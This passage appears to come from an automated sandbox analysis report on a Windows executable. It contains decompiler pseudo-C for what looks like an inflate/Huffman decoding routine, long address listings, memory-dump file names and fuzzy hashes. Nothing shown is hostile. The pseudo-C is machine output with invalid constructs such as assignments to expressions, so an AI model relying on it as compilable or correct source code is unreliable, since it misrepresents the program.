                                                                                                                          												if(__edx >= __ecx) {
                                                                                                                          													__eax = __esi[0x26e8];
                                                                                                                          													__eax = __esi[0x26e8] - __edx;
                                                                                                                          													__eflags = __eax;
                                                                                                                          												} else {
                                                                                                                          													__ecx = __ecx - __edx;
                                                                                                                          													__eax = __ecx - __edx - 1;
                                                                                                                          												}
                                                                                                                          												__edi = __esi[0x26e8];
                                                                                                                          												 *(__ebp - 0x2c) = __eax;
                                                                                                                          												__eflags = __edx - __edi;
                                                                                                                          												if(__edx == __edi) {
                                                                                                                          													__edx =  &(__esi[0x6e8]);
                                                                                                                          													__eflags = __edx - __ecx;
                                                                                                                          													if(__eflags != 0) {
                                                                                                                          														 *(__ebp - 0x30) = __edx;
                                                                                                                          														if(__eflags >= 0) {
                                                                                                                          															__edi = __edi - __edx;
                                                                                                                          															__eflags = __edi;
                                                                                                                          															__eax = __edi;
                                                                                                                          														} else {
                                                                                                                          															__ecx = __ecx - __edx;
                                                                                                                          															__eax = __ecx;
                                                                                                                          														}
                                                                                                                          														 *(__ebp - 0x2c) = __eax;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												__eflags = __eax;
                                                                                                                          												if(__eax == 0) {
                                                                                                                          													goto L183;
                                                                                                                          												} else {
                                                                                                                          													goto L48;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											L33:
                                                                                                                          											__eax = __esi[0x26e9];
                                                                                                                          											__edi =  &(__esi[0x6e8]);
                                                                                                                          											__eflags = __eax - __edi;
                                                                                                                          											if(__eax == __edi) {
                                                                                                                          												goto L38;
                                                                                                                          											}
                                                                                                                          											L34:
                                                                                                                          											__edx = __edi;
                                                                                                                          											__eflags = __edx - __eax;
                                                                                                                          											 *(__ebp - 0x30) = __edx;
                                                                                                                          											if(__edx >= __eax) {
                                                                                                                          												__ecx = __ecx - __edx;
                                                                                                                          												__eflags = __ecx;
                                                                                                                          												__eax = __ecx;
                                                                                                                          											} else {
                                                                                                                          												__eax = __eax - __edx;
                                                                                                                          												__eax = __eax - 1;
                                                                                                                          											}
                                                                                                                          											__eflags = __eax;
                                                                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                                                                          											if(__eax != 0) {
                                                                                                                          												goto L48;
                                                                                                                          											} else {
                                                                                                                          												goto L38;
                                                                                                                          											}
                                                                                                                          										case 0xb:
                                                                                                                          											goto L56;
                                                                                                                          										case 0xc:
                                                                                                                          											L60:
                                                                                                                          											__esi[1] = __esi[1] >> 0xa;
                                                                                                                          											__eax = (__esi[1] >> 0xa) + 4;
                                                                                                                          											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                                                          												goto L68;
                                                                                                                          											}
                                                                                                                          											goto L61;
                                                                                                                          										case 0xd:
                                                                                                                          											while(1) {
                                                                                                                          												L93:
                                                                                                                          												__eax = __esi[1];
                                                                                                                          												__ecx = __esi[2];
                                                                                                                          												__edx = __eax;
                                                                                                                          												__eax = __eax & 0x0000001f;
                                                                                                                          												__edx = __edx >> 5;
                                                                                                                          												__eax = __edx + __eax + 0x102;
                                                                                                                          												__eflags = __esi[2] - __eax;
                                                                                                                          												if(__esi[2] >= __eax) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												L73:
                                                                                                                          												__eax = __esi[0x143];
                                                                                                                          												while(1) {
                                                                                                                          													L76:
                                                                                                                          													__eflags = __ebx - __eax;
                                                                                                                          													if(__ebx >= __eax) {
                                                                                                                          														break;
                                                                                                                          													}
                                                                                                                          													L74:
                                                                                                                          													__eflags =  *(__ebp - 0x34);
                                                                                                                          													if( *(__ebp - 0x34) == 0) {
                                                                                                                          														goto L182;
                                                                                                                          													}
                                                                                                                          													L75:
                                                                                                                          													__ecx =  *(__ebp - 0x38);
                                                                                                                          													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                          													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                          													__ecx = __ebx;
                                                                                                                          													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                          													__ebx = __ebx + 8;
                                                                                                                          													__eflags = __ebx;
                                                                                                                          												}
                                                                                                                          												L77:
                                                                                                                          												__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
                                                                                                                          												__eax = __eax &  *(__ebp - 0x40);
                                                                                                                          												__ecx = __esi[0x144];
                                                                                                                          												__eax = __esi[0x144] + __eax * 4;
                                                                                                                          												__edx =  *(__eax + 1) & 0x000000ff;
                                                                                                                          												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                                                                          												__eflags = __eax - 0x10;
                                                                                                                          												 *(__ebp - 0x14) = __eax;
                                                                                                                          												if(__eax >= 0x10) {
                                                                                                                          													L79:
                                                                                                                          													__eflags = __eax - 0x12;
                                                                                                                          													if(__eax != 0x12) {
                                                                                                                          														__eax = __eax + 0xfffffff2;
                                                                                                                          														 *(__ebp - 8) = 3;
                                                                                                                          													} else {
                                                                                                                          														_push(7);
                                                                                                                          														 *(__ebp - 8) = 0xb;
                                                                                                                          														_pop(__eax);
                                                                                                                          													}
                                                                                                                          													while(1) {
                                                                                                                          														L84:
                                                                                                                          														__ecx = __eax + __edx;
                                                                                                                          														__eflags = __ebx - __eax + __edx;
                                                                                                                          														if(__ebx >= __eax + __edx) {
                                                                                                                          															break;
                                                                                                                          														}
                                                                                                                          														L82:
                                                                                                                          														__eflags =  *(__ebp - 0x34);
                                                                                                                          														if( *(__ebp - 0x34) == 0) {
                                                                                                                          															goto L182;
                                                                                                                          														}
                                                                                                                          														L83:
                                                                                                                          														__ecx =  *(__ebp - 0x38);
                                                                                                                          														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                          														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                          														__ecx = __ebx;
                                                                                                                          														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                          														__ebx = __ebx + 8;
                                                                                                                          														__eflags = __ebx;
                                                                                                                          													}
                                                                                                                          													L85:
                                                                                                                          													__ecx = __edx;
                                                                                                                          													__ebx = __ebx - __edx;
                                                                                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                          													 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                                          													__edx =  *(__ebp - 8);
                                                                                                                          													__ebx = __ebx - __eax;
                                                                                                                          													__edx =  *(__ebp - 8) + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                                          													__ecx = __eax;
                                                                                                                          													__eax = __esi[1];
                                                                                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                          													__ecx = __esi[2];
                                                                                                                          													__eax = __eax >> 5;
                                                                                                                          													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                                                                          													__eax = __eax & 0x0000001f;
                                                                                                                          													__eax = __edi + __eax + 0x102;
                                                                                                                          													__edi = __edx + __ecx;
                                                                                                                          													__eflags = __edx + __ecx - __eax;
                                                                                                                          													if(__edx + __ecx > __eax) {
                                                                                                                          														goto L9;
                                                                                                                          													}
                                                                                                                          													L86:
                                                                                                                          													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                                                                          													if( *(__ebp - 0x14) != 0x10) {
                                                                                                                          														L89:
                                                                                                                          														__edi = 0;
                                                                                                                          														__eflags = 0;
                                                                                                                          														L90:
                                                                                                                          														__eax = __esi + 0xc + __ecx * 4;
                                                                                                                          														do {
                                                                                                                          															L91:
                                                                                                                          															 *__eax = __edi;
                                                                                                                          															__ecx = __ecx + 1;
                                                                                                                          															__eax = __eax + 4;
                                                                                                                          															__edx = __edx - 1;
                                                                                                                          															__eflags = __edx;
                                                                                                                          														} while (__edx != 0);
                                                                                                                          														__esi[2] = __ecx;
                                                                                                                          														continue;
                                                                                                                          													}
                                                                                                                          													L87:
                                                                                                                          													__eflags = __ecx - 1;
                                                                                                                          													if(__ecx < 1) {
                                                                                                                          														goto L9;
                                                                                                                          													}
                                                                                                                          													L88:
                                                                                                                          													__edi =  *(__esi + 8 + __ecx * 4);
                                                                                                                          													goto L90;
                                                                                                                          												}
                                                                                                                          												L78:
                                                                                                                          												__ecx = __edx;
                                                                                                                          												__ebx = __ebx - __edx;
                                                                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                          												__ecx = __esi[2];
                                                                                                                          												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                                                                          												__esi[2] = __esi[2] + 1;
                                                                                                                          											}
                                                                                                                          											L94:
                                                                                                                          											__eax = __esi[1];
                                                                                                                          											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                                                                          											__edi = __eax;
                                                                                                                          											__eax = __eax >> 5;
                                                                                                                          											__edi = __edi & 0x0000001f;
                                                                                                                          											__ecx = 0x101;
                                                                                                                          											__eax = __eax & 0x0000001f;
                                                                                                                          											__edi = __edi + 0x101;
                                                                                                                          											__eax = __eax + 1;
                                                                                                                          											__edx = __ebp - 0xc;
                                                                                                                          											 *(__ebp - 0x14) = __eax;
                                                                                                                          											 &(__esi[0x148]) = __ebp - 4;
                                                                                                                          											 *(__ebp - 4) = 9;
                                                                                                                          											__ebp - 0x18 =  &(__esi[3]);
                                                                                                                          											 *(__ebp - 0x10) = 6;
                                                                                                                          											__eax = E00407272( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                                                                          											__eflags =  *(__ebp - 4);
                                                                                                                          											if( *(__ebp - 4) == 0) {
                                                                                                                          												__eax = __eax | 0xffffffff;
                                                                                                                          												__eflags = __eax;
                                                                                                                          											}
                                                                                                                          											__eflags = __eax;
                                                                                                                          											if(__eax != 0) {
                                                                                                                          												goto L9;
                                                                                                                          											} else {
                                                                                                                          												L97:
                                                                                                                          												__ebp - 0xc =  &(__esi[0x148]);
                                                                                                                          												__ebp - 0x10 = __ebp - 0x1c;
                                                                                                                          												__eax = __esi + 0xc + __edi * 4;
                                                                                                                          												__eax = E00407272(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                                                                          												__eflags = __eax;
                                                                                                                          												if(__eax != 0) {
                                                                                                                          													goto L9;
                                                                                                                          												}
                                                                                                                          												L98:
                                                                                                                          												__eax =  *(__ebp - 0x10);
                                                                                                                          												__eflags =  *(__ebp - 0x10);
                                                                                                                          												if( *(__ebp - 0x10) != 0) {
                                                                                                                          													L100:
                                                                                                                          													__cl =  *(__ebp - 4);
                                                                                                                          													 *__esi =  *__esi & 0x00000000;
                                                                                                                          													__eflags =  *__esi;
                                                                                                                          													__esi[4] = __al;
                                                                                                                          													__eax =  *(__ebp - 0x18);
                                                                                                                          													__esi[5] =  *(__ebp - 0x18);
                                                                                                                          													__eax =  *(__ebp - 0x1c);
                                                                                                                          													__esi[4] = __cl;
                                                                                                                          													__esi[6] =  *(__ebp - 0x1c);
                                                                                                                          													goto L101;
                                                                                                                          												}
                                                                                                                          												L99:
                                                                                                                          												__eflags = __edi - 0x101;
                                                                                                                          												if(__edi > 0x101) {
                                                                                                                          													goto L9;
                                                                                                                          												}
                                                                                                                          												goto L100;
                                                                                                                          											}
                                                                                                                          										case 0xe:
                                                                                                                          											goto L9;
                                                                                                                          										case 0xf:
                                                                                                                          											L175:
                                                                                                                          											__eax =  *(__ebp - 0x30);
                                                                                                                          											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                                                                          											__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                                                                                          											__ecx = __esi[0x26ea];
                                                                                                                          											__edx = __esi[0x26e9];
                                                                                                                          											__eflags = __ecx - __edx;
                                                                                                                          											 *(__ebp - 0x30) = __ecx;
                                                                                                                          											if(__ecx >= __edx) {
                                                                                                                          												__eax = __esi[0x26e8];
                                                                                                                          												__eax = __esi[0x26e8] - __ecx;
                                                                                                                          												__eflags = __eax;
                                                                                                                          											} else {
                                                                                                                          												__edx = __edx - __ecx;
                                                                                                                          												__eax = __edx - __ecx - 1;
                                                                                                                          											}
                                                                                                                          											__eflags = __ecx - __edx;
                                                                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                                                                          											if(__ecx != __edx) {
                                                                                                                          												L183:
                                                                                                                          												__edi = 0;
                                                                                                                          												goto L10;
                                                                                                                          											} else {
                                                                                                                          												L179:
                                                                                                                          												__eax = __esi[0x145];
                                                                                                                          												__eflags = __eax - 8;
                                                                                                                          												 *__esi = __eax;
                                                                                                                          												if(__eax != 8) {
                                                                                                                          													L184:
                                                                                                                          													0 = 1;
                                                                                                                          													goto L10;
                                                                                                                          												}
                                                                                                                          												goto L180;
                                                                                                                          											}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								L181:
                                                                                                                          								goto L9;
                                                                                                                          							}
                                                                                                                          							L70:
                                                                                                                          							if( *__edi == __eax) {
                                                                                                                          								goto L72;
                                                                                                                          							}
                                                                                                                          							L71:
                                                                                                                          							__esi[2] = __esi[2] & __eax;
                                                                                                                          							 *__esi = 0xd;
                                                                                                                          							goto L93;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L182:
                                                                                                                          				_t443 = 0;
                                                                                                                          				_t446[0x147] =  *(_t448 - 0x40);
                                                                                                                          				_t446[0x146] = _t425;
                                                                                                                          				( *(_t448 + 8))[1] = 0;
                                                                                                                          				goto L11;
                                                                                                                          			}









                                                                                                                          0x00406e18
                                                                                                                          0x00406e1b
                                                                                                                          0x00406e1d
                                                                                                                          0x00406e20
                                                                                                                          0x00406e22
                                                                                                                          0x00406e36
                                                                                                                          0x00406e36
                                                                                                                          0x00406e39
                                                                                                                          0x00406e53
                                                                                                                          0x00406e53
                                                                                                                          0x00406e56
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406e5c
                                                                                                                          0x00406e5c
                                                                                                                          0x00406e5f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406e65
                                                                                                                          0x00406e65
                                                                                                                          0x00000000
                                                                                                                          0x00406e65
                                                                                                                          0x00406e3b
                                                                                                                          0x00406e3e
                                                                                                                          0x00406e45
                                                                                                                          0x00406e48
                                                                                                                          0x00000000
                                                                                                                          0x00406e48
                                                                                                                          0x00406e24
                                                                                                                          0x00406e28
                                                                                                                          0x00406e2b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406e70
                                                                                                                          0x00406e70
                                                                                                                          0x00406e95
                                                                                                                          0x00406e95
                                                                                                                          0x00406e95
                                                                                                                          0x00406e97
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406e75
                                                                                                                          0x00406e75
                                                                                                                          0x00406e79
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406e7f
                                                                                                                          0x00406e7f
                                                                                                                          0x00406e82
                                                                                                                          0x00406e85
                                                                                                                          0x00406e88
                                                                                                                          0x00406e8a
                                                                                                                          0x00406e8c
                                                                                                                          0x00406e8f
                                                                                                                          0x00406e92
                                                                                                                          0x00406e92
                                                                                                                          0x00406e92
                                                                                                                          0x00406e99
                                                                                                                          0x00406ea1
                                                                                                                          0x00406ea4
                                                                                                                          0x00406ea7
                                                                                                                          0x00406ea9
                                                                                                                          0x00406eac
                                                                                                                          0x00406eac
                                                                                                                          0x00406eae
                                                                                                                          0x00406eb2
                                                                                                                          0x00406eb5
                                                                                                                          0x00406eb8
                                                                                                                          0x00406ebb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406ec1
                                                                                                                          0x00406ec1
                                                                                                                          0x00406ee6
                                                                                                                          0x00406ee6
                                                                                                                          0x00406ee6
                                                                                                                          0x00406ee8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406ec6
                                                                                                                          0x00406ec6
                                                                                                                          0x00406eca
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406ed0
                                                                                                                          0x00406ed0
                                                                                                                          0x00406ed3
                                                                                                                          0x00406ed6
                                                                                                                          0x00406ed9
                                                                                                                          0x00406edb
                                                                                                                          0x00406edd
                                                                                                                          0x00406ee0
                                                                                                                          0x00406ee3
                                                                                                                          0x00406ee3
                                                                                                                          0x00406ee3
                                                                                                                          0x00406eea
                                                                                                                          0x00406eea
                                                                                                                          0x00406ef2
                                                                                                                          0x00406ef5
                                                                                                                          0x00406ef8
                                                                                                                          0x00406efb
                                                                                                                          0x00406eff
                                                                                                                          0x00406f02
                                                                                                                          0x00406f04
                                                                                                                          0x00406f07
                                                                                                                          0x00406f0a
                                                                                                                          0x00406f24
                                                                                                                          0x00406f24
                                                                                                                          0x00406f27
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406f2d
                                                                                                                          0x00406f2d
                                                                                                                          0x00406f30
                                                                                                                          0x00406f37
                                                                                                                          0x00000000
                                                                                                                          0x00406f37
                                                                                                                          0x00406f0c
                                                                                                                          0x00406f0f
                                                                                                                          0x00406f16
                                                                                                                          0x00406f19
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406f3f
                                                                                                                          0x00406f3f
                                                                                                                          0x00406f64
                                                                                                                          0x00406f64
                                                                                                                          0x00406f64
                                                                                                                          0x00406f66
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406f44
                                                                                                                          0x00406f44
                                                                                                                          0x00406f48
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406f4e
                                                                                                                          0x00406f4e
                                                                                                                          0x00406f51
                                                                                                                          0x00406f54
                                                                                                                          0x00406f57
                                                                                                                          0x00406f59
                                                                                                                          0x00406f5b
                                                                                                                          0x00406f5e
                                                                                                                          0x00406f61
                                                                                                                          0x00406f61
                                                                                                                          0x00406f61
                                                                                                                          0x00406f68
                                                                                                                          0x00406f70
                                                                                                                          0x00406f73
                                                                                                                          0x00406f76
                                                                                                                          0x00406f78
                                                                                                                          0x00406f7b
                                                                                                                          0x00406f7b
                                                                                                                          0x00406f7d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406f83
                                                                                                                          0x00406f83
                                                                                                                          0x00406f86
                                                                                                                          0x00406f8b
                                                                                                                          0x00406f8d
                                                                                                                          0x00406f93
                                                                                                                          0x00406f95
                                                                                                                          0x00406faa
                                                                                                                          0x00406fac
                                                                                                                          0x00406fac
                                                                                                                          0x00406f97
                                                                                                                          0x00406f9d
                                                                                                                          0x00406f9f
                                                                                                                          0x00406fa1
                                                                                                                          0x00406fa1
                                                                                                                          0x00406fae
                                                                                                                          0x00406fb2
                                                                                                                          0x00406fb5
                                                                                                                          0x00406fbb
                                                                                                                          0x00406fbb
                                                                                                                          0x00406fbe
                                                                                                                          0x00406fbe
                                                                                                                          0x00406fbe
                                                                                                                          0x00406fc0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406fc6
                                                                                                                          0x00406fc6
                                                                                                                          0x00406fcc
                                                                                                                          0x00406fce
                                                                                                                          0x00406ff3
                                                                                                                          0x00406ff6
                                                                                                                          0x00406ffc
                                                                                                                          0x00407001
                                                                                                                          0x00407007
                                                                                                                          0x0040700d
                                                                                                                          0x0040700f
                                                                                                                          0x00407012
                                                                                                                          0x0040701b
                                                                                                                          0x00407021
                                                                                                                          0x00407021
                                                                                                                          0x00407014
                                                                                                                          0x00407016
                                                                                                                          0x00407018
                                                                                                                          0x00407018
                                                                                                                          0x00407023
                                                                                                                          0x00407029
                                                                                                                          0x0040702b
                                                                                                                          0x0040702e
                                                                                                                          0x00407030
                                                                                                                          0x00407036
                                                                                                                          0x00407038
                                                                                                                          0x00406982
                                                                                                                          0x00406985
                                                                                                                          0x00406985
                                                                                                                          0x00406985
                                                                                                                          0x0040698d
                                                                                                                          0x0040698d
                                                                                                                          0x00406990
                                                                                                                          0x00406992
                                                                                                                          0x00406997
                                                                                                                          0x0040699a
                                                                                                                          0x0040699c
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004069a5
                                                                                                                          0x004069a5
                                                                                                                          0x004069a7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004069ad
                                                                                                                          0x004069ad
                                                                                                                          0x004069b1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004069b7
                                                                                                                          0x004069b7
                                                                                                                          0x004069ba
                                                                                                                          0x004069bc
                                                                                                                          0x00406a5a
                                                                                                                          0x00406a5a
                                                                                                                          0x00406a5d
                                                                                                                          0x00406a5f
                                                                                                                          0x00406a5f
                                                                                                                          0x00406a62
                                                                                                                          0x00406a65
                                                                                                                          0x00406a67
                                                                                                                          0x00406a69
                                                                                                                          0x00406a6b
                                                                                                                          0x00406a6b
                                                                                                                          0x00406a74
                                                                                                                          0x00406a79
                                                                                                                          0x00406a7c
                                                                                                                          0x00406a7f
                                                                                                                          0x00406a82
                                                                                                                          0x00406a85
                                                                                                                          0x00406a85
                                                                                                                          0x00406a85
                                                                                                                          0x00406a88
                                                                                                                          0x00406a8e
                                                                                                                          0x00406a8e
                                                                                                                          0x00406a94
                                                                                                                          0x00406a94
                                                                                                                          0x00406a94
                                                                                                                          0x00000000
                                                                                                                          0x00406a88
                                                                                                                          0x004069c2
                                                                                                                          0x004069c2
                                                                                                                          0x004069c8
                                                                                                                          0x004069cb
                                                                                                                          0x004069cd
                                                                                                                          0x004069f8
                                                                                                                          0x004069fb
                                                                                                                          0x00406a01
                                                                                                                          0x00406a06
                                                                                                                          0x00406a0c
                                                                                                                          0x00406a12
                                                                                                                          0x00406a14
                                                                                                                          0x00406a17
                                                                                                                          0x00406a20
                                                                                                                          0x00406a26
                                                                                                                          0x00406a26
                                                                                                                          0x00406a19
                                                                                                                          0x00406a1b
                                                                                                                          0x00406a1d
                                                                                                                          0x00406a1d
                                                                                                                          0x00406a28
                                                                                                                          0x00406a2e
                                                                                                                          0x00406a31
                                                                                                                          0x00406a33
                                                                                                                          0x00406a35
                                                                                                                          0x00406a3b
                                                                                                                          0x00406a3d
                                                                                                                          0x00406a3f
                                                                                                                          0x00406a42
                                                                                                                          0x00406a4b
                                                                                                                          0x00406a4b
                                                                                                                          0x00406a4d
                                                                                                                          0x00406a44
                                                                                                                          0x00406a44
                                                                                                                          0x00406a47
                                                                                                                          0x00406a47
                                                                                                                          0x00406a4f
                                                                                                                          0x00406a4f
                                                                                                                          0x00406a3d
                                                                                                                          0x00406a52
                                                                                                                          0x00406a54
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a54
                                                                                                                          0x004069cf
                                                                                                                          0x004069cf
                                                                                                                          0x004069d5
                                                                                                                          0x004069db
                                                                                                                          0x004069dd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004069df
                                                                                                                          0x004069df
                                                                                                                          0x004069e1
                                                                                                                          0x004069e3
                                                                                                                          0x004069e6
                                                                                                                          0x004069ed
                                                                                                                          0x004069ed
                                                                                                                          0x004069ef
                                                                                                                          0x004069e8
                                                                                                                          0x004069e8
                                                                                                                          0x004069ea
                                                                                                                          0x004069ea
                                                                                                                          0x004069f1
                                                                                                                          0x004069f3
                                                                                                                          0x004069f6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406afa
                                                                                                                          0x00406afd
                                                                                                                          0x00406b00
                                                                                                                          0x00406b06
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406cdd
                                                                                                                          0x00406cdd
                                                                                                                          0x00406cdd
                                                                                                                          0x00406ce0
                                                                                                                          0x00406ce3
                                                                                                                          0x00406ce5
                                                                                                                          0x00406ce8
                                                                                                                          0x00406cee
                                                                                                                          0x00406cf5
                                                                                                                          0x00406cf7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406bcb
                                                                                                                          0x00406bcb
                                                                                                                          0x00406bf3
                                                                                                                          0x00406bf3
                                                                                                                          0x00406bf3
                                                                                                                          0x00406bf5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406bd3
                                                                                                                          0x00406bd3
                                                                                                                          0x00406bd7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406bdd
                                                                                                                          0x00406bdd
                                                                                                                          0x00406be0
                                                                                                                          0x00406be3
                                                                                                                          0x00406be6
                                                                                                                          0x00406be8
                                                                                                                          0x00406bea
                                                                                                                          0x00406bed
                                                                                                                          0x00406bf0
                                                                                                                          0x00406bf0
                                                                                                                          0x00406bf0
                                                                                                                          0x00406bf7
                                                                                                                          0x00406bf7
                                                                                                                          0x00406bff
                                                                                                                          0x00406c02
                                                                                                                          0x00406c08
                                                                                                                          0x00406c0b
                                                                                                                          0x00406c0f
                                                                                                                          0x00406c13
                                                                                                                          0x00406c16
                                                                                                                          0x00406c19
                                                                                                                          0x00406c31
                                                                                                                          0x00406c31
                                                                                                                          0x00406c34
                                                                                                                          0x00406c42
                                                                                                                          0x00406c45
                                                                                                                          0x00406c36
                                                                                                                          0x00406c36
                                                                                                                          0x00406c38
                                                                                                                          0x00406c3f
                                                                                                                          0x00406c3f
                                                                                                                          0x00406c6e
                                                                                                                          0x00406c6e
                                                                                                                          0x00406c6e
                                                                                                                          0x00406c71
                                                                                                                          0x00406c73
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406c4e
                                                                                                                          0x00406c4e
                                                                                                                          0x00406c52
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406c58
                                                                                                                          0x00406c58
                                                                                                                          0x00406c5b

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
                                                                                                                          • Instruction ID: b08cd02f1fd501d3445e90baf7751cef13b22d715440c1b84896235b33eeb5ef
                                                                                                                          • Opcode Fuzzy Hash: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
                                                                                                                          • Instruction Fuzzy Hash: E3E18A71904719DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1E738AA91CB04
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00407272(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                                                                          				signed int _v8;
                                                                                                                          				unsigned int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				intOrPtr* _v32;
                                                                                                                          				signed int* _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				intOrPtr _v48;
                                                                                                                          				intOrPtr _v52;
                                                                                                                          				void _v116;
                                                                                                                          				signed int _v176;
                                                                                                                          				signed int _v180;
                                                                                                                          				signed int _v240;
                                                                                                                          				signed int _t166;
                                                                                                                          				signed int _t168;
                                                                                                                          				intOrPtr _t175;
                                                                                                                          				signed int _t181;
                                                                                                                          				void* _t182;
                                                                                                                          				intOrPtr _t183;
                                                                                                                          				signed int* _t184;
                                                                                                                          				signed int _t186;
                                                                                                                          				signed int _t187;
                                                                                                                          				signed int* _t189;
                                                                                                                          				signed int _t190;
                                                                                                                          				intOrPtr* _t191;
                                                                                                                          				intOrPtr _t192;
                                                                                                                          				signed int _t193;
                                                                                                                          				signed int _t195;
                                                                                                                          				signed int _t200;
                                                                                                                          				signed int _t205;
                                                                                                                          				void* _t207;
                                                                                                                          				short _t208;
                                                                                                                          				signed char _t222;
                                                                                                                          				signed int _t224;
